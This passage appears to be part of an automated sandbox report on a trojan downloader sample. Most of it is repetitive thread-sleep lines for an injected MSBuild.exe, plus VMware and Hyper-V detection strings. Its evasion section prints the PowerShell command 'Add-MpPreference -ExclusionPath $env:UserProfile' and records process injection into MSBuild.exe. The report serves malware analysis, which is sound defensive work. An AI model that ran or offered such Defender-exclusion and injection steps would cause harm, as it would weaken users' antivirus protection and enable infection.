          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599540Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599420Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599298Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599163Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599035Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598702Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598561Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598420Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598278Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598157Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598022Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597902Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597776Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597662Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597546Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597423Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597291Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597175Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597060Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596944Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596843Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596721Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596589Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596474Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596358Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596241Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595941Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595813Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595689Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595561Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595448Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595332Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595216Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595094Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 300000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594962Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594846Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594715Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594613Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594476Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594376Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594245Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594128Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593991Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593875Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593759Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593643Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593511Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7415Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2224Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 3610Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWindow / User API: threadDelayed 6179Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -10145709240540247s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep count: 35 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -32281802128991695s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7656Thread sleep count: 3610 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -599884s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7656Thread sleep count: 6179 > 30Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -599775s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -599660s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -599540s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -599420s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -599298s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -599163s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -599035s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -598702s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -598561s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -598420s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -598278s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -598157s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -598022s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -597902s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -597776s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -597662s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -597546s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -597423s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -597291s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -597175s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -597060s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -596944s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -596843s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -596721s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -596589s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -596474s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -596358s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -596241s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -595941s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -595813s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -595689s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -595561s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -595448s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -595332s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -595216s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -595094s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 4176Thread sleep time: -300000s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -594962s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -594846s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -594715s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -594613s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -594476s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -594376s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -594245s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -594128s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -593991s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -593875s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -593759s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -593643s >= -30000sJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 7648Thread sleep time: -593511s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 1548Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 7908Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DCC2730 GetSystemInfo,GetNumaHighestNodeNumber,GetCurrentProcess,GetProcessGroupAffinity,GetLastError,GetCurrentProcess,GetProcessAffinityMask,0_2_00007FF67DCC2730
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599884Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599775Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599660Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599540Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599420Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599298Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599163Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 599035Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598702Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598561Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598420Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598278Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598157Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 598022Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597902Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597776Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597662Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597546Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597423Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597291Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597175Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 597060Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596944Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596843Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596721Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596589Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596474Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596358Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 596241Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595941Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595813Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595689Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595561Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595448Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595332Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595216Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 595094Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 300000Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594962Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594846Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594715Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594613Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594476Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594376Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594245Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 594128Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593991Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593875Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593759Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593643Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 593511Jump to behavior
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\
          Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\
          Source: Amcache.hve.7.drBinary or memory string: VMware
          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2165086329.0000019C17834000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}QUv
          Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeBinary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
          Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exe, 00000000.00000002.2165086329.0000019C17834000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}
          Source: Amcache.hve.7.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
          Source: svchost.exe, 00000009.00000002.3816548089.000002CA7A854000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.7.drBinary or memory string: vmci.sys
          Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
          Source: svchost.exe, 00000009.00000002.3815982798.000002CA7522B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
          Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.7.drBinary or memory string: VMware20,1
          Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
          Source: Amcache.hve.7.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: MSBuild.exe, 00000007.00000002.4622387096.0000000001020000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltr
          Source: Amcache.hve.7.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeCode function: 0_2_00007FF67DD19B08 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF67DD19B08
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfileJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 402000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 404000Jump to behavior
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 406000Jump to behavior
